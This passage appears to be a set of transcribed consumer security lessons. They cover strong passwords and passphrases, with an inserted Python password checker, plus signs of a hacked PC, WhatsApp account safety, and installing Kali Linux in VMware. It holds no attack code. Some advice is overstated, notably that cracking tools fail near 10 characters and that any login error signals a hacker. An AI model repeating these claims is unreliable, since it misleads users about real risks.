knowledge. Password regulations should compel users to distinguish between security and convenience: users should be prohibited from using the same password for all services, and password sharing between users, including those who work in the same department or use the same equipment, should be avoided. With this policy, a single breached password doesn't affect your other accounts. Some password regulations necessitate the creation of a passphrase rather than a password; while
passphrases serve the same objective, their length makes them more difficult to break. In addition to letters, a good passphrase should include numbers and symbols. Passwords may be easier for users to remember than passphrases; however, the latter are much more breach resistant. Two-factor authentication, or 2FA, can help secure an online account or even a smartphone. 2FA does this by asking the user to provide two forms of information, such as a password or a personal identification number (PIN) and a code texted to the user's smartphone, or a fingerprint, before accessing whatever is secured. This helps discourage unauthorized entries to an account without the original owner's permission.

At this point, you may wonder why you need a strong password in the first place. Even if most websites are safe, there is still a danger that someone will try to access or exploit your information. A strong password is among the most effective ways to protect your accounts and personal information from hackers. You should follow certain rules and guidelines while creating a strong password; password managers are also recommended to help remember the created passwords for convenience of usage. With that being said, let's take a look at the topics we are covering today. We start by learning about the state of password cracking in today's world and why creating strong passwords is an absolute must for every account. Next, we will look at some guidelines and rules that help strengthen passwords and make password cracking a daunting task for hackers. Moving on, we understand why passphrases have grown in popularity and are being recommended for credential protection over traditional passwords. Finally, we take a look at how password managers help alleviate the problem of creating and remembering complex passwords along with other critical personal information. Let's start by learning about why strong passwords have become an absolute necessity. One of the most common ways that hackers break into computers is by guessing passwords. Simple and
commonly used passwords enable intruders to easily gain access to and control of a computing device. Conversely, a password that is difficult to guess makes it prohibitively difficult for common hackers to break into a machine and will force them to look for another target. The more difficult the password, the lower the likelihood that one's computer will fall victim to an unwanted intrusion. Many individuals opt to tie their website passwords to something they can readily recall, generally easy, memorable combos; however, this does not make the password unique. In fact, it's the reverse: passwords are handled by 53 percent of individuals using their recollection and memory. With modern computational standards, simple passwords take seconds, or a couple of minutes at worst, to be completely brute forced. According to global surveys, more than 60 percent of people use the same passwords for their personal and job applications. While this may allow the user never to forget the password, it creates a single point of failure, the only pin to drop: if one of the accounts gets breached, all subsequent accounts are as good as hacked. To further elaborate on how you can create strong passwords, let's go through some do's and don'ts to understand how to create new passwords for accounts. It is recommended to keep the password length at at least 12 characters to ensure brute forcing is difficult. A combination of upper- and lowercase letters is an absolute necessity when creating strong passwords. It is also recommended to use numerics along with those letters to create a complicated password. Finally, special characters help in making a password much more brute force resistant than any number of letters can. Moving over to the don'ts section, it's absolutely not recommended to keep simple dictionary terms such as "computer" or even the word "password" as your credential, because those are very easy to brute force and are usually present in the majority of
dictionary attack word lists. Similarly, changing a single letter or a single character in a dictionary word does not make it brute force resistant, considering there are already algorithms present that can counter this tactic. Using the same character multiple times in a password also reduces the strength and makes it easier for hackers to crack. Apart from using single characters multiple times, following patterns that are present on the traditional English keyboard, such as "qwerty" or the line below the main letters such as "zxcvbnm", makes it easier to guess, since these are once again common combinations that are present in word lists already. Finally, the most important part is not using personal information such as birthdays, addresses and other important information in passwords. More often than not, if a hacker is trying to break into your account, there has been some amount of research done, be it via social media or any other medium; if they already have this information with them, breaking into the account becomes all the easier. Now that you understand how to create a strong password, let's look at how passphrases have become prevalent as a replacement for plaintext passwords. A passphrase is a sentence-like string of words used for authentication that is longer than a traditional password, easy to remember and difficult to crack. Typical passwords range on average from 8 to 16 characters, while passphrases can reach up to 100 characters or more. Using a long passphrase instead of a short password to create a digital signature is one of the many ways that users can strengthen the security of their data, devices and accounts. The longer a passphrase is, the more likely a user is to incorporate bits of entropy, or factors that make it less predictable to potential attackers. As more websites, applications and services increase their user security requirements, passphrases are the fast and easy way to meet these criteria. Let's take a look at some of the advantages that passphrases have over common passwords.
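To make the do's and don'ts above concrete, here is an added Python checker (not from the video) that reports each violated rule: minimum length of 12, mixed case, digits and symbols, dictionary words even with a single character changed or leet-style substitutions, repeated characters, keyboard runs such as qwerty and zxcvbnm, and personal information supplied by the caller. The dictionary and keyboard rows are small constructed stand-ins for a real word list.

```python
# Added example (not from the video): a password checker encoding the do's and
# don'ts above. DICTIONARY is a constructed sample; a real deployment would load
# a full cracking word list.
import re
import string

MIN_LENGTH = 12                                               # "at least 12 characters"
DICTIONARY = {"password", "computer", "welcome", "letmein"}   # constructed sample list
KEYBOARD_ROWS = ("qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890")
# Single-character substitutions that cracking tools already try (p@ssw0rd -> password)
LEET = str.maketrans({"@": "a", "0": "o", "1": "i", "3": "e", "$": "s", "5": "s", "!": "i"})

def _core_word(pw: str) -> str:
    """Lowercase, drop leading/trailing digits and symbols, undo leet, keep letters only."""
    core = re.sub(r"^[^a-z]+|[^a-z]+$", "", pw.lower())
    return re.sub(r"[^a-z]", "", core.translate(LEET))

def _within_one_edit(a: str, b: str) -> bool:
    """True if a equals b or differs by one substitution, insertion or deletion."""
    if abs(len(a) - len(b)) > 1:
        return False
    i = j = edits = 0
    while i < len(a) and j < len(b):
        if a[i] == b[j]:
            i, j = i + 1, j + 1
            continue
        edits += 1
        if edits > 1:
            return False
        if len(a) > len(b):
            i += 1
        elif len(a) < len(b):
            j += 1
        else:
            i, j = i + 1, j + 1
    return edits + (len(a) - i) + (len(b) - j) <= 1

def _has_keyboard_run(pw: str, length: int = 4) -> bool:
    """Any run of `length` adjacent keys from one keyboard row, forwards or backwards."""
    p = pw.lower()
    for row in KEYBOARD_ROWS:
        for i in range(len(row) - length + 1):
            seg = row[i:i + length]
            if seg in p or seg[::-1] in p:
                return True
    return False

def check_password(pw: str, personal_info=()) -> list:
    """Return the violated rules; an empty list means the password passes every rule."""
    problems = []
    if len(pw) < MIN_LENGTH:
        problems.append("too short")
    if not (any(c.isupper() for c in pw) and any(c.islower() for c in pw)):
        problems.append("needs upper and lower case")
    if not any(c.isdigit() for c in pw):
        problems.append("needs a digit")
    if not any(c in string.punctuation for c in pw):
        problems.append("needs a special character")
    core = _core_word(pw)
    # A dictionary word with one character swapped, or with digits/symbols
    # appended, is still a dictionary word to a cracking tool
    if core and any(_within_one_edit(core, word) for word in DICTIONARY):
        problems.append("dictionary word (or one edit away)")
    if re.search(r"(.)\1\1", pw):
        problems.append("repeated character")
    if _has_keyboard_run(pw):
        problems.append("keyboard pattern")
    for item in personal_info:
        if item and item.lower() in pw.lower():
            problems.append(f"contains personal info ({item})")
    return problems

if __name__ == "__main__":
    for candidate in ("password", "P@ssw0rd2023!", "Qwerty123456!Ab", "Blue$Giraffe7Sky!"):
        print(candidate, "->", check_password(candidate) or "ok")
```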
Passphrases are simpler to remember than just a random assortment of symbols and characters: it's easier to comprehend a line from your favorite song or a quotation than a short but difficult password. Passwords are reasonably easy for humans and robots to guess or crack; online thieves have also advanced and created cutting-edge hacking tools to crack even the most complex passwords. Passphrases are nearly impossible to crack, since most efficient password cracking programs fail at approximately 10 characters; as a result, even the most sophisticated cracking tool will be unable to guess, brute force or pre-compute these passwords. Passphrases comply with password-setting rules with ease: the usage of punctuation and upper- and lowercase letters satisfies the password complexity criteria. Most operating systems and apps support passphrases; passphrases of up to 127 characters are permitted on all major operating systems, including Windows, Linux and Mac. As a result, for optimal protection you can use lengthier passphrases. But when creating a strong password, the major problem people come across is remembering these passwords or passphrases; this is where you can find a use for a password manager. When you establish accounts or change passwords, password managers generate new strong passwords and keep all of them in one place, protected by a single strong master password. If you maintain your master password, the manager will retain everything else, including your usernames and passphrases, and fill them in for you whenever you sign on to a website or app on your computer or phone. There is no good memory needed for this; it implies that everyone may use the most recent suggestions for strong passwords, such as extended phrases, symbols, grammar and capitalization. Password managers enable consumers to write a single master password and automatically fill each website with their own unique set of credentials, and not just passwords: credit card information
may be stored securely with several password managers. Some others offer multi-factor authentication or use a second test, such as answering a question once the correct password is input, which is a simple and effective solution to verify legitimate login inputs. Among the global players in password managers, services like Bitwarden, KeePass and Dashlane have been running for years now and are very worthy recommendations if you want to get started with password management.

Now that we understand what hacking is, let's take a look at some points to know whether our system is already hacked or not. The first point regarding how to check whether a system is hacked or not: there can be cases where the system security is switched off by unknown means and it is not visible to the user; this is one of the most primary checkpoints to know if our system is hacked or not. The next point to check whether a system is hacked or not would be frequent antivirus software failures, which are due to interference from hacking attempts performed by a professional hacker or a cybercriminal. Then we also face problems regarding the system's reaction speed, which is affected by the execution of unknown applications in the background of the system, which also affects the hardware resources of the device. Next, we also face problems regarding passwords which are no longer working or have been changed without the user's intervention, which might indicate that some unknown hacking activity took place in our account. Let's take a look at some more points regarding the topic. There are often cases when the system's cursor moves on its own and performs tasks, indicating that the system is being used by someone else using an illegal hacking method. There are also cases when we see files and folders being created on the storage disk of the system which are unknown to us. To better understand the points regarding how to identify whether our system is hacked or not, let's take a look. Let's start with the first point: if
we want to check whether a system is hacked or not, the first point would be to choose the Settings option, go to Privacy and Security, and move on to Windows Security. This option that is available on our system allows us to see the various protection applications that are available on the system. If we see any problem regarding any one of them, for example App and Browser Control: in my system it says there's a problem with it, which might be due to hacking attempts that were done on my system. Now let's take a look at the other option for how we can check whether a system is hacked or not: that would be checking the antivirus software that is installed on our system. If you face problems regarding that, this might be the issue. According to my antivirus software, it says my computer is at risk; this might be due to interference from a cybercriminal or a hacker while using different illegal software during their hacking attempt. Then there are also cases where we see unknown programs being executed in the background of a system, which we can take a look at using the Task Manager. Using the Task Manager, we can take a look at each and every application that is being executed in the system and see its origin; if we find any unknown program or application, we can assume that it might be due to a hacking attempt. Moving on, if we want to check further whether our system is hacked or not, we can check for files or folders that are being created that are unknown to us. For example, this unknown folder, which contains some security details that are unknown to me, might also be due to a hacking attempt by a hacker or a cybercriminal. Then there are also cases when the system's cursor moves on its own and performs tasks that are not initiated by us, such as copying different folders or data from one file to another; this is due to a hacking attempt that was done on the system, and the hacker has taken control of the system. Then there are also cases regarding login issues or password
problems. For example, if I want to access my account and there's a problem with the password, it might be due to an attempt at hacking into my account by a professional hacker. It seems like there's a problem with the username, which means there was a hacking attempt by a professional hacker. We can further check for hacking attempts by accessing a web browser and checking whether there are some extra add-ons or unknown add-ons that weren't installed by us; this might also indicate a hacking attempt on the system. Now that we are clear about how to check whether a system is hacked or not, let's take a look at some of the countermeasures against hacking. Let's begin: the first point regarding how to avoid hacking is to do regular manual security checks and keep the system security updated. Using certified antivirus software is a basic countermeasure against hacking attempts, and, if possible, visit only secure websites when surfing the Internet, or use a VPN or other Internet security applications to mask your system's network to avoid any hacking attempts on the device. Then we have: avoid clicking on random web pop-ups and ads, to prevent hackers from getting into a system and accessing the device's data. And lastly, use strong passwords or complex passwords for your login details. Applying these countermeasures, we can avoid hacking to a certain extent.

The concept of instant messaging crossed into the mainstream in the 1990s, allowing friends, acquaintances, colleagues and like-minded thinkers from all over the world to connect in real time. Since then, instant messaging has revolutionized how we communicate, and today over a billion people are signed up for at least one messaging app. The present instant messaging experience is seamless, and it intuitively integrates features like video, photos, voice, e-commerce and gaming with plain old messaging. Among these apps, WhatsApp has comfortably found its place among the most popular messaging platforms. Like everything associated with the internet, a matter of
security is never far away. Considering the huge user base of this messaging app, hackers are always on the lookout for accounts to compromise. Today we are going to cover some of the ways we can protect our WhatsApp account from falling into malicious hands. We start by learning about the importance of security when it comes to WhatsApp and instant messaging apps in general. Next, we cover some of the most important steps that should be followed in order to protect our WhatsApp accounts from hackers. Finally, we learn what we should do when a WhatsApp account gets compromised. Let's start by learning why we need to focus on the safety of WhatsApp. In the year 2020, the big news was about Amazon CEO Jeff Bezos and his phone being hacked by Saudi Arabia. A report coming from The Guardian suggested that Bezos's phone was hacked via a video file sent on WhatsApp. The report said that Bezos's mobile phone was hacked by a Saudi Arabian prince in the year 2018 and gigabytes' worth of data was stolen from the device. While there are some issues being raised about the report, which states with medium to high confidence that Jeff Bezos's phone was hacked, it does raise a security fear for regular users: after all, if the phone of one of the world's most powerful men can be hacked, the same can happen to any one of us as well. When it comes to regular users, we exchange messages with loved ones regarding a wide range of topics; the information, which may seem trivial initially, can later function as ammunition for an identity theft campaign. Basic information like preferred banks or occasional dining places can go a long way in social engineering attacks, further increasing the need for secure messaging habits. WhatsApp uses end-to-end encryption to protect all communication on its platform. These encryption keys not only make it impossible to decrypt messages, but they also prevent third parties, and even WhatsApp, from accessing messages or calls, but not entirely: although end-to-end encryption
makes WhatsApp more secure than other communication apps, no app is 100% safe to use. Like any application or digital device, WhatsApp is often targeted by bad actors. It also has access to your contacts and tracks where and how long you use it, putting your privacy and personal information at risk. We all have access to our cell phones, so it's no surprise that SMS two-factor authentication is one of the most widespread types of MFA available: you don't need any apps or digital keys, and it's not tied to a specific ecosystem. Unfortunately, it's also not a secure multi-factor authentication method. The nature of SMS itself opens up your organization to a host of risks; hackers may have many ways to leverage SMS to find a way into your accounts and network, be it via SIM swapping or message hijacking. WhatsApp 2FA using SMS isn't a foolproof solution. Now that we understand the variety of reasons why WhatsApp needs extra security, let's go through some of the ways we can achieve this. It is more than probable that one fine day you might receive a WhatsApp message or even an SMS that reads "your order is delayed, please check its status here", or "your account is locked, please unlock it here", or even some tempting messages like "win free 3G and movie tickets here". Some of them may sound intimidating and some of them may be lucrative, but they all have one purpose: to trick you into clicking that link, and once you do that, it's already over. It will install malware on your phone, and you won't have a clue about it; only when you start noticing that your phone bills are abnormally high or your bank account has been used without your permission will the realization dawn upon you that something is wrong with your phone, but by then it may be too late. WhatsApp in itself provides various privacy options to users. The messaging platform provides users with the option to choose who they want to share their profile photo, status and other details with. It's a good idea to change the settings to
Contacts Only; this means only phone numbers that are saved on your smartphone will be able to see your profile photo, status, phone number and auto-delete status as well. Make sure you enable the option to lock the screen every time WhatsApp is closed; this will ensure no one else but you can open your WhatsApp account. Just head to the Settings menu, then Privacy, and select the Screen Lock option. You will then need to register your fingerprint; after the process is completed, you will have to scan your fingerprint every time you open the WhatsApp app. This adds an extra layer of security. Two-step verification works as an extra layer of security and helps WhatsApp users protect the OTPs and documents shared through WhatsApp. It's very easy to set up a PIN to activate two-step verification; users have to enter it periodically. Once it is activated, WhatsApp will sometimes keep asking users to enter this six-digit passcode; users cannot disable this without disabling the two-step verification feature altogether. In case users do not provide WhatsApp with an email ID and want to disable two-step verification, then the number will be permitted to re-verify on WhatsApp without the passcode after 7 days; however, the users will lose all pending messages upon re-verifying. We often have the tendency to log into WhatsApp Web at the office and then leave the account open on the desktop. This habit can actually create problems for you: someone else sitting at the same PC can access all your chats without you even realizing it. It's a good practice to log out from WhatsApp before leaving the office; it just takes a few seconds to log in again by scanning the code, and you're done. All WhatsApp users should ensure that their chats are end-to-end encrypted. To verify that a chat is end-to-end encrypted, open the chat, tap on the name of the contact to open the contact info screen, and then tap Encryption to view the QR code and a 60-digit number. WhatsApp end-to-end encryption ensures that only you
and your contact can read the messages that are being exchanged, and nobody in between, not even WhatsApp. With the necessary guidelines out of the way, let us go through the recommended course of action should our WhatsApp accounts be compromised. The first and most important thing that you need to do is report the issue to the WhatsApp support team for assistance. Make sure that you reach out to the support team through its help desk and report the hacking attempt; the WhatsApp help center will take the shortest time to resolve your issue via email or within the app itself. This will help you take prompt legal action against the hackers. If you can't access your email, call the support team; in some cases, support will deactivate your WhatsApp account and request you to reactivate it within 30 days if you don't want it to be deleted completely. When someone compromises your WhatsApp account, they can now send messages to your contacts stating that the company sent your verification code, and gain access to the account. That's why one of the first things you'll want to do is send a message to your friends and family letting them know that you've lost access to your account; this action prevents further exploitation of your account and others. Another reason you'll want to let your contacts know you have no access to your WhatsApp account is that the attackers may phish for personal information, from your banking number to your email address; hackers will cleverly attempt to gain as much access to your personal information as possible. WhatsApp Web is an extension of WhatsApp Messenger over the web that facilitates easy synchronization of our smartphone and personal computer. This is the biggest security threat that hackers can easily exploit to get into your personal data over WhatsApp; therefore, it is highly recommended that you use this WhatsApp feature carefully. Once you notice that your WhatsApp Messenger has been hacked, go to WhatsApp Web and tap or click on the "Log out from all
computers" option; this will deactivate all the web extensions of your account. In other unfortunate circumstances, where account recovery doesn't seem likely, you can always ask WhatsApp support to delete your account permanently. While far from the ideal solution, it can act as a fail-safe option if you want to protect your personal data at any cost possible; you can always open a new account later with the security issues mitigated.

It's no secret that the majority of our internet usage is at risk of being hacked, be it via unsafe messaging applications or misconfigured operating systems. To counteract this void of digital security, penetration testing has become the norm when it comes to vulnerability assessment. Kali Linux is an operating system that has become a well-known weapon in this fight against hackers: a Linux distribution that is made specifically for penetration testers, Kali Linux has layers of features that we will be covering in today's lesson. Let's take a look at the topics to be covered in this video. We start by learning about Kali Linux and a basic explanation of its purpose. We take a look at the history of Kali Linux, from the story of its origin to its current-day exploits. Next, we learn a few distinct features of Kali that make it an attractive choice for penetration testers worldwide. Finally, we take a look at the multiple ways we can install Kali Linux to start a journey in the world of penetration testing. Let's start by learning about Kali Linux in general. Kali Linux, which was formerly known as BackTrack Linux, is an open source Linux distribution aimed at advanced penetration testing and security auditing. It contains several hundred tools that are targeted towards various information security tasks, such as penetration testing, security research, computer forensics and reverse engineering. Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists. Among all the Linux distributions, Kali Linux
takes its roots from the Debian operating system. Debian has been a highly dependable and stable distribution for many years, providing a similarly strong foundation to the Kali desktop. While the operating system is capable of practically modifying every single part of our installation, the networking components of Kali are disabled by default. This is done to prevent any external factors from affecting the installation procedure, which may pose a risk in critical environments; apart from boosting security, it allows a deeper element of control to the most enthusiastic of users. We did not get Kali Linux from the first day, so how did it come into existence? Let's take a look at some of its history. Kali Linux is based on years of knowledge and experience in building penetration testing operating systems. During all these project lifelines there have been only a few different developers, as the team has always been small. The first project was called WHoppiX, which stands for White Hat Knoppix; as can be inferred from the name, it was based on the Knoppix operating system as its underlying OS. WHoppiX had releases ranging from version 2.0 to 2.7. This made way for the next project, which was known as WHAX, the long-hand being White Hat Slax; the name change was because the base OS was changed from Knoppix to Slax. WHAX started at version 3 as a nod to carrying on from WHoppiX. There was a similar OS being produced at the same time, Auditor Security Collection, often shortened to just Auditor, which was once again using Knoppix. Its efforts were combined with WHAX to produce BackTrack. BackTrack was based on Slackware from version 1 to version 3, but switched to Ubuntu later on with versions 4 to 5. Using the experience gained from all of this, Kali Linux came after BackTrack in 2013.
Kali started off using Debian stable as the engine under the hood before moving to Debian testing when Kali Linux became a rolling operating system. Now that we understand the history and the purpose of Kali Linux, let us learn a little more about its distinct features. The latest version of Kali comes with more than 600 penetration tools pre-installed. After reviewing every tool that was included in BackTrack, the developers eliminated a great number of tools that either simply did not work or duplicated other tools that provided the same or similar functionality. The Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols. Restricting access to critical code bases from external assets greatly reduces the risk of source contamination, which could cause Kali Linux users worldwide a great deal of damage as direct victims of cybercrime. Although penetration tools tend to be written in English, the developers have ensured that Kali includes true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job. The more comfortable a user feels with the intricacies of the operating system, the easier it is to maintain a stronghold over the configuration and the device in general. Since ARM-based single-board systems like the Raspberry Pi are becoming more and more prevalent and inexpensive, the development team knew that Kali's ARM support would need to be as robust as they could manage, with fully working installations. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution, so the tools for ARM are updated in conjunction with the rest of the distribution. All this information is necessary for users to determine if Kali Linux is the correct choice for them. If it is, what are the ways that they can go forward with this
installation and start the penetration testing journey? The first way to use Kali Linux is by launching the distribution in live USB mode. This can be achieved by downloading the installer image file, or ISO file, from the Kali Linux website and flashing it to a USB drive with a capacity of at least 8 GB. Some people don't need to save their data permanently, and a live USB is the perfect solution for such cases. After the ISO image is flashed, the thumb drive can be used to boot a fully working installation of the operating system, with the caveat that any changes made to the OS in this mode are not written permanently. Some cases allow persistent usage in live USBs, but those require further configuration than normal situations. But what if the user wants to store data permanently in the installed OS? The best and most reliable way to ensure this is the full-fledged hard disk installation. This will ensure the complete usage of the system's hardware capabilities and will take into account the updates and the configurations being made to the OS. This method is supposed to override any pre-existing operating system installed on the computer, be it Windows or any other variant of Linux. The next alternative route for installing Kali Linux would be to use virtualization software such as VMware or VirtualBox. The software will be installed as a separate application on an already existing OS, and Kali Linux can be run as an operating system in the same computer as a window. The hardware requirements will be completely customizable, starting with the allotted RAM to the virtual hard disk capacity. The usage of both a host and a guest operating system like Kali Linux allows users a safe environment to learn while not putting their systems at risk. If you want to learn more about how one can go forward with this method, we have a dedicated video where Kali Linux is being installed on VMware while running on a Windows 10 operating system. You can find the link in the description box to get
started with your very own virtual machine. The final way to install Kali Linux is by using a dual boot system. To put it in simple words, the Kali Linux OS will not be overwriting any pre-installed operating system on a machine but will be installed alongside it. When the computer boots up, the user will get a choice to boot into either of these operating systems. Many people prefer to keep both Windows and Kali Linux installed so the distribution of work and recreational activities is also allotted effectively. It gives users a safety valve should their custom Linux installation run into any bugs that cannot be fixed from within the operating system. Now, for the convenience of explanation, we're going to install Kali Linux today on virtual machine software known as VMware. VMware is able to run multiple operating systems on a single host machine, which in our case is a Windows 10 system. To get started with the Kali Linux installation, we have to go to the website to download an image file. We go to Get Kali, and as you can see there are multiple platforms on which this operating system can be installed. As per our requirement, we're going to go with the virtual machine section; as you can see, it is already recommended by the developers. This is the download button, which will download a 64-bit ISO file. We can download 32-bit, but that is more necessary for bare-metal machines or if you're going to use it for older devices which do not support 64-bit operating systems yet. After clicking on the download button we can see we have an archive which will contain the ISO file. For now, we have downloaded the ISO file and it is already present with me, so we can start working on the VM side of things. Once the ISO file is downloaded, we open up VMware Workstation, go to File and create a new virtual machine. Of these two options, it is highly recommended to go with the typical setup rather than the custom one. The custom setup is much more advanced and requires much more information from the user,
which is beneficial for developers and people who are well versed with virtualization software, but in 90% of the cases the typical setup will be enough. Here we can select the third option, which is "I will install the operating system later". For some operating systems we can use the ISO file here directly and VMware will install it for us, but for right now, in the case of Kali Linux, the third option is always the safest. Kali Linux is a Linux distribution, so we can select Linux over here, and for the version, as you can see, there are multiple versions, such as the multiple kernels. Every distribution has a parent distribution; for example, Kali Linux has Debian, and there are other distributions which are based on or forked from some parent distribution. Kali Linux is based on Debian, so we can go with the highest version of Debian, which is Debian 10.x 64-bit, and go on to Next. We can write any name; we can write Kali Linux so that it will be easier to recognize the virtual machine among the list of virtual machine instances. The location can be any location you decide. By default it should be the Documents folder, but wherever you put it will hold all the information of the operating system: all the files you download, all the configurations you store, everything will be stored in this particular location that you provide. When we go Next, we are asked about the disk capacity. This disk capacity will be all the storage that will be provided to your virtual machine of Kali Linux. Think of your Windows device: if you have a one terabyte hard drive, you have the entirety of the hard disk to store data on. However much storage you give here, you can only store up to that amount of data, not to mention some amount of capacity will be taken up by the operating system itself to store its programs and applications. For now we can give around, let's say, 15 GB, or since the recommended size for this type is 20, you can just go ahead with 20. It depends on the use case; if you are going to use
it extensively you can even go as high as 50 or 60 GB if you have plans to download many more applications and perform multiple different tests. Another option we get over here is storing the virtual disk as a single file or storing it in multiple files. As we already know, this virtual machine runs entirely on VMware. Sometimes, when transferring these virtual machine instances, let's say from a personal computer to a work computer, you're going to need to copy the entire folder that we mentioned before. Instead, all virtual machines have a portability feature. Now, this portability feature is possible for all scenarios, except it is much easier if we split the virtual disk into multiple files. Even though this makes porting virtual machines easier, from either system to system or software to software, let's say if you want to switch from VMware to VirtualBox or vice versa, the performance takes a small hit. It's not huge, but it's recommended to go with storing the virtual disk as a single file if you have no purpose of ever moving the virtual machine. Even if you do, it's not a complete stop that it cannot be ported; it's just easier when using multiple files. But in order to get the best performance out of a virtual machine, we can store it as a single file over here. This is a summary of all the changes that we made and all the configurations that have been settled until now. At this point of time we have not provided the .iso file yet, which is the installation file for Kali Linux that we downloaded from the website. As of right now we have only configured the settings of the virtual machine, so we can press on Finish and we have Kali Linux in the list. Now, to make further changes, we press on Edit virtual machine settings. The memory setting is supposed to give the RAM of the virtual machine. For devices with 8 GB of RAM or below, giving a high amount of RAM will cause performance issues on the host system. If the memory has some amount of free capacity
left, let's say on idle my Windows machine takes about 2 GB, so I have 6 GB of memory to provide, although if you provide all of the 6 GB it will be much more difficult for the host system to run everything properly. So for this instance we can keep it as 2 GB of memory for the virtual machine instance. Similarly, we can set the number of processors and customize it according to our liking; let's say we want to use one processor but two different cores, we can select that as well. The hard disk is pre-set up as a SCSI hard disk and it does not need to be changed for the installation of this operating system at all. CD/DVD: this is where the installation file comes in. You can think of the ISO file that we downloaded as a pen drive or a USB thumb drive which is necessary to install an operating system. To provide this, we're going to select "Use ISO image file", click on Browse, go to Downloads and select the ISO file over here, select Open, and we can see it is already loaded up. Next, in the network adapter, it is recommended to use NAT. This helps the virtual machine to draw the internet from the host machine settings: if your host machine is connected to the internet, then the virtual machine is connected as well. There are some other options such as host-only, custom segments or LAN segments, but those are not necessary for installation. The rest of them are pretty standard, do not need any extra configuration and can be left as they are. Press OK and now we can power on this virtual machine. In this screen we can choose how we want to proceed with the installation. We have a "Start installer" option over here, so we're going to press Enter on that and wait for things to load from the ISO file. The first step in the installation is choosing the language of the operating system; for this we can go with English as standard. Then comes the location. This is used for setting up the time and some of the internal settings which
depend entirely on the location of the user, so for this we're going to go with India. Configuring the keyboard: it's always recommended to go with American English first. Many people make the mistake of going with the Indian keyboard if it is possible, and it causes a lot of issues later on, so it's always preferable to go with American English. If later we see some necessity for another keyboard layout, we can install it then, but for now we should always stick with American English as a basic. At this point it's going to load the installation components from the .iso file. It is a big file of 3.6 GB, so it has a lot of components that need to be put into the virtual machine, which can also be used to detect hardware. Once the hardware and the network configuration is done by the ISO file, we want to write a hostname for the system. This hostname can be anything which is used to recognize this device on a local network; let's say we use the name kali. The domain name we can skip for now; it's not necessary as such for the installation. This is the full name for the user; let's say we provide the name Simplilearn as the full name. Next we're going to set up a username. This username is going to be necessary to identify the user from the root account and the subsequent accounts below it. For now we can give it something such as simply123. Now we have to choose a password for the user. Remember, since this is the first user that is being added onto this newly installed operating system, it needs to be a password for the administrator. We can use whichever password we like over here, use the same password below and press on Continue. At this point it's going to detect the components on which the operating system can be installed. Here there are multiple options, like "use entire disk", "use entire disk and set up LVM" and "use entire disk and set up encrypted LVM". For newcomers it is recommended to just use the first
one, since LVM encryption is something that we can learn afterwards when you are much more hands-on with the Linux operating system. For now we're going to use the "use entire disk" guided installation and press on Continue. When we set up the virtual machine on VMware, we had set up a disk capacity of a proper 20 GB; that is the hard disk which is being discovered here. Even though it is a virtual disk on VMware, it acts as a normal hard disk on which an operating system can be installed, so we select this one and press on Continue. Here there is a choice of partition schemes. All the operating systems that are installed have different components: one is used for keeping the applications, one for the files, another for the RAM management and other things. For newcomers it is always recommended to keep it in one partition, so we're going to select that and press on Continue. This is just an overview of the partitioning it's going to make. As you can see, it has a primary partition of 20.4 GB and a logical partition of 1 GB used for swap memory. Now, these kinds of names can be confusing for people who are not well versed with Linux operating systems or virtualization in general, but for now you can go ahead and press on Continue, as this will be fine. We can press on "Finish partitioning and write changes to disk" and Continue. It's just a confirmation page; as you can see, it shows that SCSI3 is our virtual hard disk of 20 GB capacity. We write the changes to the disk: we press Yes and click on Continue. At this point the installation has started. Now, this installation will take a while depending on the amount of RAM provided, the processors provided and how much the performance of the system is being hampered by the host machine. On quick systems this will be rather quick, while on the smaller ones this will take a while. Since this is going to take some time to install, as it is being run on a virtual machine with only 2 GB of RAM, we're going to speed up this part of the video so
we don't have to waste any more time just watching the progress bar. Now that our core installation is completed, it's asking us to configure a package manager. The work of a package manager on a Linux operating system is similar to the Google Play Store on Android mobile devices and the App Store on Apple devices: it's an interface to install external applications which are not installed by default, let's say Google Chrome or any other browser which can be used to browse the internet. At this point of time it asks us to select a network mirror; we're going to select Yes and move forward with this. Next it's going to ask us for an HTTP proxy, which we can leave blank and press on Continue. At this point of time it's looking for updates to the Kali Linux installation; this will fetch the new builds from the Kali server so the installation is always updated to the latest version. Now that the package manager is configured, we have the GRUB boot loader. GRUB is used for selecting the operating system while booting up; its core functionality is to allow the operating system to be loaded correctly without any faults. So at this point of time, when it asks to install the GRUB boot loader to your primary drive, we can select Yes and press Continue. Remember, the installation was conducted on /dev/sda, so we're going to select installation of the GRUB loader on the same hard disk that we have configured. We select this one and press Continue, and now the GRUB boot loader is being installed. GRUB is highly essential because it shows the motherboard where to start the operating system from. Even if the operating system is installed correctly and all the files are in the correct order, in the absence of a boot loader it will not be able to launch the OS properly. As you can see, the installation is finally complete, so now we can press on Continue and it's going to finalize the changes. Now you can see Kali Linux being booted up straight away; it doesn't check for the ISO file
anymore since the operating system is now installed onto the virtual hard disk storage that we had configured before. Here we're going to enter the username and password that we had set up before, and we have the Kali system booted up. This is your home page. We can see the installed applications over here, which are being used for penetration testing by multiple security analysts worldwide. Further tools can be installed using the APT package manager that we had configured. We can see the full name over here, and with this our installation of Kali Linux is complete.

Hey everyone. It's no secret that the majority of our internet usage is at the risk of getting hacked, be it via unsafe messaging applications or misconfigured operating systems. To counteract this void of digital security, penetration testing has become the norm when it comes to vulnerability assessment. Parrot Security OS is an operating system that has become a well-known weapon in this fight against hackers. While a Linux distribution more catered towards penetration testers specifically, Parrot Security has layers of features that we will be covering in today's lesson. Let's take a look at the topics for this video. We start by learning about what Parrot Security is, then why it should be considered as a viable alternative next to Kali Linux for penetration testers. Next we take a look at the minimum system requirements necessary to obtain optimum performance from an installation of Parrot Security. Moving on, we learn about some unique features that make Parrot stand out among the multiple ethical hacking operating systems available on the market. And finally, we look at the multiple ways that Parrot Security OS can be installed, be it on a single system or from portable media. So let's start out by learning what Parrot Security is. Parrot OS is a Debian-based Linux distribution with an emphasis on security, privacy and development. It is built on Debian's testing branch and uses a custom hardened Linux
